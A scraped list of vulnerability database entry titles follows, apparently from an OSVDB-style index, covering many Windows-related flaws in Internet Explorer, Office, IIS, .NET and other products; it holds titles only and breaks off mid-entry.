Microsoft .NET Framework Chart Control Special URI Character GET Request Parsing Remote Information Disclosure [74398] Microsoft Visio Move Around the Block Visio File Handling Remote Code Execution [74397] Microsoft Visio pStream Release Visio File Handling Remote Code Execution [74396] Microsoft Report Viewer Control Unspecified XSS [74207] IBM Tivoli Directory Server (TDS) on Windows cn=changelog Search Remote DoS [74192] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Certificate Subject DLL Validation MiTM Remote Code Execution [74191] Citrix Access Gateway Plugin for Windows NSEPA.NsepaCtrl.1 ActiveX (nsepa.ocx) Crafted HTTP Header Remote Overflow [74052] Microsoft IE EUC-JP Encoding Unspecified XSS [73977] ArcSight Connector Appliance Windows Event Log SmartConnector Exported Report Files Permissions Weakness Local Log Data Modification [73897] Oracle VM VirtualBox Guest Additions for Windows XPDM Display Driver Local Overflow [73835] Opera Pop-up Windows Text Node Selection DoS [73773] WebKit Windows Functionality Same Origin Policy Bypass Arbitrary File Disclosure [73670] Microsoft IE XSLT Heap Memory Address Information Disclosure [73660] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [73647] Google Chrome on Windows Unspecified Remote Code Execution [73380] Microsoft Lync Web Components Server Reach/Client/WebPages/ReachJoin.aspx reachLocale Parameter XSS [73372] Apple Mac OS X QuickLook Microsoft Office File Handling Memory Corruption [73230] IBM Datacap Taskmaster Capture Cross-domain Username Windows Authentication Remote Bypass [73100] Microsoft Word Insufficient Pointer Validation Memory Corruption [72960] Microsoft SMB Client Response Handling Remote Code Execution [72954] Microsoft IE Vector Markup Language (VML) Object Handling Memory Corruption [72953] Microsoft IE MIME Sniffing Information Disclosure [72952] Microsoft IE CDL Protocol 302 HTTP Redirect Memory Corruption [72951] Microsoft IE selection.empty JavaScript Statement onclick Event Memory Corruption [72950] Microsoft IE layout-grid-char Style Property Handling Memory Corruption [72949] Microsoft IE Drag and Drop Information Disclosure [72948] Microsoft IE Multiple JavaScript Modifications DOM Manipulation Memory Corruption [72947] Microsoft IE Time Element Memory Corruption [72946] Microsoft IE Drag and Drop Memory Corruption [72944] Microsoft IE SafeHTML Function XSS [72943] Microsoft IE vgx.dll imagedata VML Object DOM Modification Memory Corruption [72942] Microsoft IE Link Properties Handling Memory Corruption [72934] Microsoft XML Editor External Entities Resolution Unspecified Information Disclosure [72933] Microsoft Forefront Threat Management Gateway (TMG) Firewall Client Winsock Provider Remote Code Execution [72932] Microsoft .NET Framework JIT Object Validation Arbitrary Code Execution [72931] Microsoft .NET Framework / Silverlight Array Offset Remote Code Execution [72927] Microsoft Office Excel Out of Bounds WriteAV Unspecified Arbitrary Code Execution [72926] Microsoft Office Excel WriteAV Unspecified Arbitrary Code Execution [72925] Microsoft Office Excel File Handling Unspecified Memory Corruption [72924] Microsoft Office Excel File Handling Unspecified Buffer Overflow [72923] Microsoft Office Excel Unspecified Memory Heap Overwrite Arbitrary Code Execution [72922] Microsoft Office Excel Out of Bounds Array Access Unspecified Arbitrary Code Execution [72921] Microsoft Office Excel Improper Record Parsing Unspecified Arbitrary Code Execution [72920] Microsoft Office Excel Insufficient Record Validation Unspecified Arbitrary Code Execution [72916] Autonomy KeyView Windows Write File Processing Overflow [72724] Microsoft IE Cookie Jacking Account Authentication Bypass [72696] Microsoft Reader AOLL Chunk Array Overflow [72695] Microsoft Reader ITLS Header Piece Handling Overflow [72688] Microsoft IE CEnroll tar.setPendingRequestInfo Remote DoS [72687] Microsoft Reader aud_file.dll Audible Audio File Handling Null Byte Memory Corruption [72686] Microsoft Reader msreader.exe Integer Underflow LIT File Handling Overflow [72685] Microsoft Reader msreader.exe LIT File Handling Overflow [72680] Microsoft IE UTF-7 Local Redirection XSS [72679] Microsoft IE Tags javascript:[jscodz] XSS [72677] Microsoft IE Mime-Sniffing Content-Type Handling Weakness [72674] Microsoft IE img Tag Cross-domain Cookie Disclosure [72671] Microsoft Excel Spreadsheet Printing Memory Cleartext PIN Disclosure [72236] Microsoft Office PowerPoint Presentation Parsing Unspecified Overflow [72235] Microsoft Office PowerPoint File Handling Unspecified Memory Corruption [72091] Mozilla Firefox for Windows WebGLES Library Missing ASLR Protection Weakness [71929] HP Virtual Server Environment for Windows Unspecified Remote Privilege Escalation [71856] Microsoft IIS Status Header Handling Remote Overflow [71847] Wireshark on Windows epan/dissectors/packet-nfs.c NFS Dissector DoS [71782] Microsoft .NET Framework x86 JIT Compiler XAML Browser Application (XBAP) Processing Stack Corruption [71777] Microsoft IE Frame Tag Handling Information Disclosure [71771] Microsoft Office PowerPoint TimeColorBehaviorContainer (Techno-color Time Bandit) Floating Point Processing Remote Code Execution [71770] Microsoft Office PowerPoint PersistDirectoryEntry Processing Remote Code Execution [71769] Microsoft Office PowerPoint OfficeArt Atom Parsing Remote Code Execution [71767] Microsoft Office Path Subversion Arbitrary DLL Injection Code Execution [71766] Microsoft Office Excel RealTimeData Record Parsing WriteAV Remote Code Execution [71765] Microsoft Office Excel File Validation Record Handling Overflow [71761] Microsoft Office Excel File Handling Memory Corruption [71760] Microsoft Office Excel File Handling Unspecified Memory Corruption [71759] Microsoft Office Excel External Record Parsing Signedness Overflow [71758] Microsoft Office Excel Substream Parsing Integer Underflow [71726] Microsoft IE JavaScript Unspecified Cross-domain Information Disclosure [71725] Microsoft IE Object Management onPropertyManagement Processing Memory Corruption [71724] Microsoft IE Layouts Handling Memory Corruption [71670] Microsoft IE Pop-up Window Address Bar Spoofing Weakness [71668] Microsoft Visual Studio CPFE.DLL Malformed Source File Handling DoS [71665] Microsoft .NET Framework on XP KB982671 Persistent Firewall Disablement [71596] QTweb for Windows CSS Handling DoS [71595] Apple Safari on Windows CSS Handling DoS [71594] Microsoft IE JavaScript Math.random Implementation Seed Reconstruction Weakness [71400] Adobe Reader / Acrobat on Windows Unspecified Permissions Issue Privilege Escalation (2011-0564) [71354] Nessus Client on Windows Path Subversion Arbitrary DLL Injection Code Execution [71086] Microsoft Visual Studio MFC Applications Path Subversion Arbitrary DLL Injection Code Execution [71017] Microsoft Malware Protection Engine (MMPE) Crafted Registry Key Local Privilege Escalation [70904] Microsoft Office Excel OfficeArt Container Parsing Memory Corruption [70857] Metasploit Framework on Windows Insecure Filesystem Permissions Local Privilege Escalation [70850] Windows Azure SDK Web Role Session Cookies State Information Disclosure [70833] Microsoft IE Insecure Library Loading Remote Code Execution [70832] Microsoft IE mshtml.dll Dangling Pointer Memory Corruption Remote Code Execution [70831] Microsoft IE Uninitialized Memory Corruption Remote Code Execution (2011-0035) [70829] Microsoft Visio Unspecified Data Type Handling Memory Corruption Remote Code Execution [70828] Microsoft Visio LZW Stream Decompression Exception Remote Code Execution [70821] Microsoft OpenType Compact Font Format (CFF) Parsing Remote Code Execution [70813] Microsoft Office PowerPoint OfficeArt Container Parsing Remote Code Execution [70812] Microsoft Office Excel Invalid Object Type Handling Remote Code Execution [70811] Microsoft Office Excel Axis Properties Record Parsing Overflow [70810] Microsoft Office Excel Drawing File Format Shape Data Parsing Use-after-free Arbitrary Code Execution [70726] Opera on Windows Downloads Manager Filesystem Viewing Application Pathname Verification Weakness Arbitrary Code Execution [70622] HP Business Service Management on Windows Unspecified XSS [70557] Oracle Database Server on Windows Cluster Verify Utility Named Pipe Arbitrary Local Command Execution [70509] Oracle Sun Directory Server Enterprise Edition Identity Synchronization for Windows Unspecified Local Issue [70444] Microsoft Data Access Components (MDAC / WDAC) MSADO Record CacheSize Handling Remote Code Execution [70443] Microsoft Data Access Components (MDAC / WDAC) ODBC API (odbc32.dll) SQLConnectW Function DSN / szDSN Argument Handling Overflow [70392] Microsoft IE DOM Implementation cross_fuzz GUI Display Weakness [70391] Microsoft IE MSHTML.DLL ReleaseInterface Function Use-after-free Arbitrary Code Execution [70167] Microsoft IIS FTP Server Telnet IAC Character Handling Overflow [70142] ManageEngine globalSettings.do newWindows Parameter XSS [70012] Opera on Windows Insecure Third Party Module Warning Message Implementation Weakness [69942] Microsoft WMI Administrative Tools WEBSingleView.ocx ActiveX Remote Code Execution [69830] Microsoft IE Cross-Domain Information Disclosure (2010-3348) [69829] Microsoft IE HTML+Time Element outerText Memory Corruption [69828] Microsoft IE Recursive Select Element Remote Code Execution [69827] Microsoft IE Animation HTML Object Memory Corruption (2010-3343) [69826] Microsoft IE Cross-Domain Information Disclosure (2010-3342) [69825] Microsoft IE HTML Object Memory Corruption (2010-3340) [69817] Microsoft SharePoint Office Document Load Balancer Crafted SOAP Request Remote Code Execution [69815] Microsoft Office Publisher Array Indexing Memory Corruption [69814] Microsoft Office Publisher Malformed PUB File Handling Memory Corruption [69813] Microsoft Office Publisher pubconv.dll Array Indexing Memory Corruption [69812] Microsoft Office Publisher pubconv.dll Unspecified Heap Overrun [69811] Microsoft Office Publisher pubconv.dll Size Value Handling Heap Corruption [69810] Microsoft Exchange Server store.exe Malformed MAPI Request Infinite Loop Remote DoS [69809] Microsoft Office FlashPix Image Converter Tile Data Handling Heap Corruption [69808] Microsoft Office FlashPix Image Converter Picture Set Processing Overflow [69807] Microsoft Office Document Imaging Endian Conversion TIFF Image Handling Memory Corruption [69806] Microsoft Office TIFF Image Converter Endian Conversion Buffer Overflow [69805] Microsoft Office TIFF Import/Export Graphic Filter Converter Multiple Overflows [69804] Microsoft Office PICT Image Converter Overflow [69803] Microsoft Office CGM Image Converter Overflow [69796] Microsoft IE CSS Parser mshtml.dll CSharedStyleSheet::Notify Function Use-after-free Remote Code Execution [69771] Mozilla Multiple Products For Windows Line-breaking document.write Call Arbitrary Code Execution [69753] Apple QuickTime on Windows Crafted Track Header Atom Overflow [69752] Apple QuickTime on Windows Apple Computer Directory Permissions Weakness Local Information Disclosure [69606] AWStats on Windows awstats.cgi configdir Parameter Crafted Share Config File Arbitrary Command Execution [69311] Apple Mac OS X QuickLook Crafted Microsoft Office Document Handling Overflow [69095] Microsoft Forefront Unified Access Gateway (UAG) Signurl.asp XSS [69094] Microsoft Forefront Unified Access Gateway (UAG) Mobile Portal Website Unspecified XSS [69093] Microsoft Forefront Unified Access Gateway (UAG) EOP Unspecified XSS [69092] Microsoft Forefront Unified Access Gateway (UAG) Redirection Spoofing Weakness [69091] Microsoft Office PowerPoint File Animation Node Parsing Underflow Heap Corruption [69090] Microsoft Office PowerPoint 95 File Parsing Overflow [69089] Microsoft Office Insecure Library Loading Remote Code Execution [69088] Microsoft Office MSO Large SPID Read AV Remote Code Execution [69087] Microsoft Office Drawing Exception Handling Remote Code Execution [69086] Microsoft Office Art Drawing Record Parsing Remote Code Execution [69085] Microsoft Office 2010 RTF File Handling pFragments Buffer Overflow Arbitrary Code Execution [68987] Microsoft IE mshtml CSS Tag Use-after-free Memory Corruption [68918] Windows Server 2008 Color Control Panel Path Subversion Arbitrary DLL Injection Code Execution [68855] Microsoft IE window.onerror Error Handling URL Destination Information Disclosure [68585] Microsoft Foundation Classes (MFC) Library Window Title Handling Remote Overflow [68584] Microsoft Office Word Uninitialized Pointer Handling Remote Code Execution [68583] Microsoft Office Word Unspecified Boundary Check Remote Code Execution [68582] Microsoft Office Word Array Index Value Handling Unspecified Remote Code Execution [68581] Microsoft Office Word File Unspecified Structure Handling Stack Overflow [68580] Microsoft Office Word Return Value Handling Unspecified Remote Code Execution [68579] Microsoft Office Word Bookmark Handling Invalid Pointer Remote Code Execution [68578] Microsoft Office Word Pointer LFO Parsing Double-free Remote Code Execution [68577] Microsoft Office Word Malformed Record Handling Remote Heap Overflow [68576] Microsoft Office Word BKF Object Parsing Array Indexing Remote Code Execution [68575] Microsoft Office Word File LVL Structure Parsing Remote Code Execution [68574] Microsoft Office Word File Record Parsing Unspecified Memory Corruption [68573] Microsoft Office Excel File Unspecified Record Parsing Remote Integer Overflow [68572] Microsoft Office Excel Formula Record Parsing Memory Corruption (2010-3231) [68571] Microsoft Office Excel File Format Parsing Remote Code Execution [68570] Microsoft Office Excel Lotus 1-2-3 Workbook Parsing Remote Overflow [68569] Microsoft Office Excel Formula Substream Record Parsing Memory Corruption [68568] Microsoft Office Excel Formula Biff Record Parsing Remote Code Execution [68567] Microsoft Office Excel Out Of Bounds Array Handling Remote Code Execution [68566] Microsoft Office Excel Merge Cell Record Pointer Handling Remote Code Execution [68565] Microsoft Office Excel Negative Future Function Parsing Remote Code Execution [68564] Microsoft Office Excel PtgExtraArray Structure Parsing Remote Code Execution [68563] Microsoft Office Excel RealTimeData Record Array Parsing Remote Code Execution [68562] Microsoft Office Excel Out-of-Bounds Memory Write in Parsing Memory Corruption [68561] Microsoft Office Excel Ghost Record Type Parsing Remote Code Execution [68556] Microsoft .NET Framework x64 JIT Compiler Unprivileged Application Remote Code Execution [68548] Microsoft IE / SharePoint Unspecified XSS [68547] Microsoft IE CSS Special Character Processing Unspecified Information Disclosure [68546] Microsoft IE Object Handling Unspecified Memory Corruption (2010-3326) [68545] Microsoft IE Anchor Element Handling Unspecified Information Disclosure [68544] Microsoft IE AutoComplete Functionality Unspecified Information Disclosure [68543] Microsoft IE HtmlDlgHelper Class Object Handling Memory Corruption [68542] Microsoft IE CSS imports() Cross-domain Information Disclosure [68541] Microsoft IE mshtml.dll CAttrArray::PrivateFind Function Object Handling Memory Corruption [68540] Microsoft IE mshtml.dll Object Handling Uninitialized Memory Corruption (2010-3331) [68438] Microsoft XSS Filter Library Bypass [68413] Adobe Reader / Acrobat on Windows Unspecified ActiveX Arbitrary Code Execution [68362] Apple Safari on Windows Webkit.dll Malformed SGV Text Style Handling DoS [68151] Microsoft Office Word MSO.dll Crafted Document Buffer NULL Dereference DoS [68127] Microsoft ASP.NET ViewState Cryptographic Padding Remote Information Disclosure [68123] Microsoft IE / SharePoint toStaticHTML Function Crafted CSS @import Rule XSS Protection Mechanism Bypass [67984] Microsoft Multiple Products Unicode Scripts Processor (Usp10.dll) OpenType Font Processing Memory Corruption [67982] Microsoft Outlook E-mail Content Parsing Remote Overflow [67980] Microsoft IIS Unspecified Remote Directory Authentication Bypass [67979] Microsoft IIS FastCGI Request Header Handling Remote Overflow [67978] Microsoft IIS Repeated Parameter Request Unspecified Remote DoS [67977] Microsoft Visual C++ Redistributable Path Subversion Arbitrary DLL Injection Code Execution [67973] HP Data Protector Express on Windows dpwindtb.dll DtbClsLogin() Function Overflow [67960] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67834] Microsoft IE Cross-Origin CSS Style Sheet Handling Information Disclosure [67795] HP Operations Agent on Windows Unspecified Remote Code Execution [67794] HP Operations Agent on Windows Unspecified Local Privilege Escalation [67733] RealPlayer on Windows RealMedia IVR File Malformed Header Index Array Error Arbitrary Code Execution [67730] RealPlayer on Windows Unspecified Access Restriction Remote Bypass [67704] IBM DB2 Universal Database on Windows User / Group Enumeration DoS [67602] Apple QuickTime on Windows Path Subversion Arbitrary DLL Injection Code Execution [67598] Microsoft Office OneNote Path Subversion Arbitrary DLL Injection Code Execution [67597] Microsoft Office Word Path Subversion Arbitrary DLL Injection Code Execution [67596] Microsoft Office Excel Path Subversion Arbitrary DLL Injection Code Execution [67595] Microsoft Office Access Path Subversion Arbitrary DLL Injection Code Execution [67594] Microsoft Outlook Path Subversion Arbitrary DLL Injection Code Execution [67547] Apple Safari on Windows Path Subversion Arbitrary DLL Injection Code Execution [67546] Microsoft Visio Path Subversion Arbitrary DLL Injection Code Execution [67503] Microsoft Outlook Express Path Subversion Arbitrary DLL Injection Code Execution [67484] Microsoft Office Groove Path Subversion Arbitrary DLL Injection Code Execution [67483] Microsoft Office PowerPoint Path Subversion Arbitrary DLL Injection Code Execution [67463] Microsoft IE location.replace Address Bar Spoofing [67455] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [67365] Microsoft IE removeAttribute() Method Multiple HTML Element Handling NULL Pointer DoS [67329] Apple iTunes for Windows Path Subversion Arbitrary DLL Injection Code Execution [67258] Microsoft ClickOnce MITM Weakness [67132] Microsoft IE Modal Application Prompt Rendering Unspecified DoS [67131] Microsoft IE mshtml.dll Malformed CSS Handling DoS [67121] Windows Mobile on HTC Unspecified Client-side Issue [67119] Microsoft Outlook Web Access (OWA) Multiple Function CSRF [67003] Microsoft IE HTML Layout Table Element Handling Memory Corruption [67002] Microsoft IE Object Handling Unspecified Memory Corruption (2010-2559) [67001] Microsoft IE CIframeElement Object Handling Race Condition Memory Corruption [67000] Microsoft IE boundElements Property Handling Memory Corruption [66999] Microsoft IE OnPropertyChange_Src() Function Malformed HTML/JS Data Handling Memory Corruption [66998] Microsoft IE Event Handler Unspecified Cross-domain Information Disclosure [66997] Microsoft Office Word DOC plcffldMom Parsing Memory Corruption [66996] Microsoft Office Word RTF Document Object Control Word Drawing Overflow [66995] Microsoft Office Word RTF Document Control Word Parsing Memory Corruption [66994] Microsoft Office Word Malformed Record Parsing Unspecified Remote Code Execution [66993] Microsoft .NET Framework / Silverlight CLR Virtual Delegate Handling Remote Code Execution [66992] Microsoft Silverlight Pointer Handling Unspecified Memory Corruption [66991] Microsoft Office Excel PivotTable Cache Data Record Handling Overflow [66973] Microsoft XML Core Services Msxml2.XMLHTTP.3.0 ActiveX HTTP Response Handling Memory Corruption [66752] Google Chrome Windows Kernel Flaw Mitigation Weakness Unspecified Issue [66458] Microsoft DirectX DirectPlay Unspecified NULL Dereference Remote DoS [66457] Microsoft DirectX DirectPlay Unspecified Packet Handling Remote DoS [66381] HP Insight Orchestration for Windows Unspecified Remote Data Modification [66337] Oracle Database Server on Windows Net Foundation Layer Component Unspecified DoS (2010-0903) [66334] Oracle Database Server on Windows Network Layer Component Unspecified Remote Issue (2010-0900) [66296] Microsoft Outlook SMB Attachment Handling Arbitrary Program Execution [66295] Microsoft IE / Office FieldList ActiveX (ACCWIZ.dll) Remote Code Execution [66294] Microsoft Office Access AccWizObjects ActiveX Remote Code Execution [66263] HP Virtual Connect Enterprise Manager for Windows Unspecified XSS [66219] Microsoft Help Files (.CHM) Locked File Functionality Bypass [66160] Microsoft IIS Basic Authentication NTFS Stream Name Permissions Bypass [66040] Ruby on Windows ARGF.inplace_mode Variable Local Overflow [65794] Microsoft IE Cross-domain IFRAME Gadget Focus Change Restriction Weakness Keystroke Disclosure [65531] nginx on Windows URI ::$DATA Append Arbitrary File Access [65503] Microsoft IE CImWebObj ActiveX Local Overflow DoS [65502] Microsoft IE Unspecified DoS [65487] NovaBACKUP Network / NovaNet on Windows Unspecified Remote Arbitrary Code Execution [65441] Microsoft .NET ASP.NET Form Control __VIEWSTATE Parameter XSS [65343] Microsoft IE ICMFilter Arbitrary UNC File Access [65294] nginx on Windows Encoded Space Request Remote Source Disclosure [65242] CA ARCserve Backup on Windows Unspecified Local Information Disclosure [65239] Microsoft Office Excel String Variable Handling Unspecified Code Execution [65238] Microsoft Office Excel Malformed RTD Handling Memory Corruption [65237] Microsoft Office Excel Malformed RTD Record Handling Memory Corruption [65236] Microsoft Office Excel Malformed OBJ Record Handling Overflow [65235] Microsoft Office Excel Malformed HFPicture Handling Memory Corruption [65234] Microsoft Office Excel on Mac OS X Open XML Permission Weakness [65233] Microsoft Office Excel Unspecified Memory Corruption (2010-0823) [65232] Microsoft Office Excel Malformed ExternName Record Handling Memory Corruption [65231] Microsoft Office Excel Malformed WOPT Record Handling Memory Corruption [65230] Microsoft Office Excel EDG / Publisher Record Handling Memory Corruption [65229] Microsoft Office Excel SxView Record Handling Memory Corruption [65228] Microsoft Office Excel ADO Object DBQueryExt Record Handling Arbitrary Code Execution [65227] Microsoft Office Excel SXVIEW Record Parsing Memory Corruption [65226] Microsoft Office Excel Unspecified Record Handling Stack Corruption Arbitrary Code Execution [65220] Microsoft SharePoint Crafted Request Help Page Invocation Remote DoS [65218] Microsoft IE 8 Developer Tools ActiveX Remote Code Execution [65216] Microsoft IIS Extended Protection for Authentication Memory Corruption [65215] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1259) [65214] Microsoft IE Uninitialized Object Handling Memory Corruption (2010-1261) [65213] Microsoft IE HTML Element Handling Memory Corruption [65212] Microsoft IE CStyleSheet Object Handling Memory Corruption [65211] Microsoft IE / Sharepoint toStaticHTML Information Disclosure [65150] Microsoft ASP.NET HtmlContainerControl InnerHtml Property Setting Weakness XSS [65110] Microsoft IE Invalid news / nntp URI IFRAME Element Handling Remote DoS [65024] Microsoft Access Backslash Escaped Input SQL Injection Protection Bypass [65013] Microsoft .NET ASP.NET EnableViewStateMac Property Default Configuration XSS [64980] Microsoft Outlook Web Access (OWA) URI id Parameter Information Disclosure [64978] HTC Windows Mobile SMS Preview PopUp SMS Message XSS [64952] Microsoft IE img Tag Hijacking Weakness [64944] Microsoft Dynamics GP Default System Password [64848] Microsoft Dynamics GP System Password Field Substitution Cipher Weakness [64828] Microsoft IE history go ActiveX Overflow DoS [64824] Microsoft IE Address Bar Character Conversion Spoofing Weakness [64794] Microsoft Multiple Products smtpsvc.dll DNS Implementation Predictable Transaction ID MitM DNS Response Spoofing Weakness [64793] Microsoft Multiple Products smtpsvc.dll DNS Implementation ID Transaction Validation MiTM DNS Response Spoofing Weakness [64791] Mozilla Firefox on Windows JavaScript P Element xul.dll gfxWindowsFontGroup::MakeTextRun Function DoS [64790] Mozilla Firefox on Windows JavaScript P Element String Handling DoS [64789] Mozilla Firefox on Windows JavaScript String Concatenation Substring Operation NULL Dereference DoS [64786] Microsoft IE mailto: URL Multiple IFRAME Element Handling DoS [64702] Apple Safari on Windows HTTP Authorization: Basic Header Logging Cross-domain Information Disclosure [64666] Microsoft IE Invisible Hand Extension HTTP Request Logging Cookie Product Search Disclosure [64615] HP Insight Control Server Migration for Windows Unspecified XSS [64539] Microsoft Office OCX ActiveX Controls OpenWebFile() Arbitrary Program Execution [64533] Microsoft IE document.createElement NULL Dereference DoS [64531] Microsoft Outlook Web Access (OWA) Path Traversal Attachment Handling Weakness [64529] Microsoft Visual Basic for Applications VBE6.dll Single-Byte Stack Overwrite [64446] Microsoft Office Visio VISIODWG.DLL Crafted DXF File Handling Overflow [64387] Apple Safari on Windows data.length Handling Local DoS [64384] OpenOffice.org (OOo) on Windows slk File Parsing NULL Pointer DoS [64170] Microsoft SharePoint Server _layouts/help.aspx cid0 Parameter XSS [64083] Microsoft IE XSS Filter Script Tag Filtering Weakness [63931] HP Operations Manager on Windows SourceView ActiveX (srcvw32.dll / srcvw4.dll) LoadFile() Method Remote Overflow [63766] Adobe Reader on Windows PDF Document Embedded EXE File Arbitrary Code Execution [63748] Microsoft Office Publisher 97 File Conversion TextBox Processing Overflow [63742] Microsoft Office Visio Unspecified Index Calculation Memory Corruption [63741] Microsoft Office Visio Unspecified Attribute Validation Memory Corruption [63653] DWG Windows FTP Server Multiple Command Login Restriction Bypass [63522] Microsoft Virtual PC / Server Hypervisor Virtual Machine Monitor Memory Management Implementation Memory Location Protection Mechanism Restriction Bypass [63473] Microsoft IE XML Document Image Element SRC Attribute Unspecified Issue [63470] Microsoft IE Unspecified Arbitrary Code Execution (PWN2OWN) [63469] Microsoft IE DLL File Base Address Discovery Overflow (PWN2OWN) [63451] Apple QuickTime on Windows Crafted BMP File Arbitrary Code Execution [63450] Apple iTunes on Windows Installation Package Race Condition Local Privilege Escalation [63448] Apple QuickTime on Windows MediaVideo Sample Description Atom (STSD) Parsing Memory Corruption [63447] Apple QuickTime on Windows Crafted PICT Image Overflow [63428] Microsoft Wireless Keyboard MAC Address XOR Key Generation Weakness [63335] Microsoft IE Unspecified Uninitialized Memory Corruption [63334] Microsoft IE Post Encoding Information Disclosure [63333] Microsoft IE Unspecified Race Condition Memory Corruption [63332] Microsoft IE Object Handling Unspecified Memory Corruption (2010-0490) [63331] Microsoft IE HTML Object onreadystatechange Event Handler Memory Corruption [63330] Microsoft IE HTML Rendering Unspecified Memory Corruption [63329] Microsoft IE Tabular Data Control (TDC) ActiveX URL Handling CTDCCtl::SecurityCHeckDataURL Function Memory Corruption [63328] Microsoft IE HTML Element Handling Cross-Domain Information Disclosure [63327] Microsoft IE CTimeAction Object TIME2 Handling Memory Corruption [63324] Microsoft IE createElement Method Crafted JavaScript NULL Dereference DoS [63322] Apple Safari on Windows JavaScriptCore.dll HTML Document Object Substring Occurrence DoS [63296] Windows Media Player Error Message Remote File Enumeration [63262] Mozilla Multiple Products on Windows extensions/auth/nsAuthSSPI.cpp nsAuthSSPI::Unwrap Function DoS [63260] CA ARCserve Backup for Windows JRE Multiple Unspecified Issues [63247] Novell eDirectory for Windows Malformed HTTP Request Handling Remote Overflow [63139] lighttpd on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63138] Mongoose on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63137] Cherokee Web Server on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [63136] nginx on Windows 8.3 Filename Alias Request Access Rules / Authentication Bypass [62938] Apple Safari on Windows URL Scheme Validation Crafted HTML File Handling Arbitrary Code Execution [62936] Apple Safari on Windows ImageIO Crafted TIFF File Arbitrary Code Execution [62935] Apple Safari on Windows ImageIO Crafted TIFF File Process Memory Disclosure [62934] Apple Safari on Windows ImageIO Crafted BMP File Process Memory Disclosure [62933] Apple Safari / iTunes on Windows ColorSync Crafted Image Color Profile Overflow [62823] Microsoft Office Excel XLS File DbOrParamQry Record Parsing Overflow [62822] Microsoft Office Excel XLSX File ZIP Header Processing Memory Corruption [62821] Microsoft Office Excel FNGROUPNAME Record Handling Memory Corruption [62820] Microsoft Office Excel Workbook Globals Stream MDXSET Record Handling Overflow [62819] Microsoft Office Excel MDXTUPLE Record Handling Overflow [62818] Microsoft Office Excel Sheet Object Type Confusion Arbitrary Code Execution [62817] Microsoft Office Excel File Record Handling Unspecified Memory Corruption [62810] Microsoft IE iepeers.dll Use-After-Free Arbitrary Code Execution [62751] Apple Safari on Windows CFNetwork cfnetwork.dll Multiple Element Remote DoS [62587] Hitachi JP1/Cm2/Network Node Manager Remote Console on WIndows File Permission Weakness Unspecified Local Privilege Escalation [62547] Adobe getPlus DLM (Download Manager) on Windows getPlus Downloader Software Installation Authorization Weakness [62466] Microsoft IE CSS Stylesheet Cross-origin Information Disclosure [62438] Google Gadget ActiveX Microsoft ATL Template Unspecified Arbitrary Code Execution [62400] Microsoft Wordpad Malformed RTF File Parsing Memory Exhaustion DoS [62309] Google Chrome on Windows Shortcut Character Escaping Arbitrary Program Execution [62246] Microsoft Data Analyzer ActiveX Web Page Handling Unspecified Arbitrary Code Execution [62241] Microsoft Office Powerpoint TextBytesAtom Record Handling Remote Code Execution [62240] Microsoft Office Powerpoint TextCharsAtom Record Handling Remote Code Execution [62239] Microsoft Office Powerpoint File Path Handling Overflow [62238] Microsoft Office Powerpoint LinkedSlideAtom Handling Remote Code Execution [62237] Microsoft Office Powerpoint OEPlaceholderAtom placementId Parameter Handling Remote Code Execution [62236] Microsoft Office Powerpoint msofbtClientData Container OEPlaceholderAtom Use After Free Remote Code Execution [62235] Microsoft Office Excel MSO.DLL OfficeArtSpgr Container Overflow [62229] Microsoft IIS Crafted DNS Response Inverse Lookup Log Corruption XSS [62221] OpenSolaris Default Configuration smbadm Windows Active Directory Domain Joining Unspecified Issue [62220] OpenSolaris Default Configuration kclient Windows Active Directory Domain Joining Unspecified Issue [62157] Microsoft IE text/html Content Type URLMON Sniffing Arbitrary File Access [62156] Microsoft IE Dynamic OBJECT Tag Cross-domain Arbitrary File Access [61914] Microsoft IE Javascript Cloned DOM Object Handling Memory Corruption [61913] Microsoft IE HTML Object Handling Unspecified Memory Corruption [61912] Microsoft IE Baseline Tag Rendering Memory Corruption [61911] Microsoft IE Table Layout Reuse Memory Corruption [61910] Microsoft IE Table Layout Col Tag Cache Update Handling Memory Corruption [61909] Microsoft IE Unspecified Crafted URL Handling Arbitrary Code Execution [61908] Cisco InternetWork Performance Monitor on Windows getProcessName CORBA GIOP Request Overflow [61906] Adobe Flash Player on Windows ActiveX Unspecified Arbitrary Remote Code Execution [61905] Adobe Flash Player on Windows Use-after-free Movie Unloading Memory Corruption [61697] Microsoft IE mshtml.dll Use-After-Free Arbitrary Code Execution (Aurora) [61525] Microsoft Commerce Server ADMINDBPS Registry Key Encoded Password Local Disclosure [61516] Apple Safari for Windows search-ms Protocol Handler Arbitrary Program Execution [61432] Microsoft IIS Colon Safe Extension NTFS ADS Filename Syntax Arbitrary Remote File Creation [61294] Microsoft IIS ASP Crafted semicolon Extension Security Bypass [61249] Microsoft IIS ctss.idc table Parameter SQL Injection [61203] GTK+ gdk/gdkwindow.c gdk_window_begin_implicit_paint() Function Foreign Windows Weakness [60891] Adobe Flash Player ActiveX on Windows Unspecified Arbitrary File Access [60839] Microsoft IE CAttrArray Object Circular Dereference Remote Code Execution [60838] Microsoft IE CSS Element Access Race Condition Memory Corruption [60837] Microsoft IE XHTML DOM Manipulation Memory Corruption [60834] Microsoft WordPad / Office Text Converters Word97 File Handling Memory Corruption [60830] Microsoft Office Project File Handling Memory Validation Arbitrary Code Execution [60804] Novell iPrint Client on Windows Unspecified Time Information Overflow [60803] Novell iPrint Client on Windows ienipp.ocx target-frame Parameter Handling Overflow [60660] Microsoft IE Response-Changing Mechanism Output Encoding XSS [60587] Windows File Sharing Samba Client Resource Exhaustion DoS [60578] Windows 2000 Subnet Bandwidth Manager RSVP Server Authority Hijacking [60510] SugarCRM on Windows .htaccess Direct Request Arbitrary File Access [60504] Microsoft IE PDF Export Title Property File Path Disclosure [60490] Microsoft IE Layout STYLE Tag getElementsByTagName Method Handling Memory Corruption [60437] PHP on Windows popen Invalid Mode Handling DoS [60401] Microsoft IE Crafted DHTML AnchorClick Attribute Handling Remote DoS [60397] Microsoft Outlook HTML Email CODEBASE Parameter Arbitrary Program Execution [60370] PGP PGPDisk Windows User Switching Cross-user Plaintext Information Disclosure [60317] HP Operations Manager on Windows Unspecified Access Restriction Bypass [60295] Microsoft IE Image ICC Profile 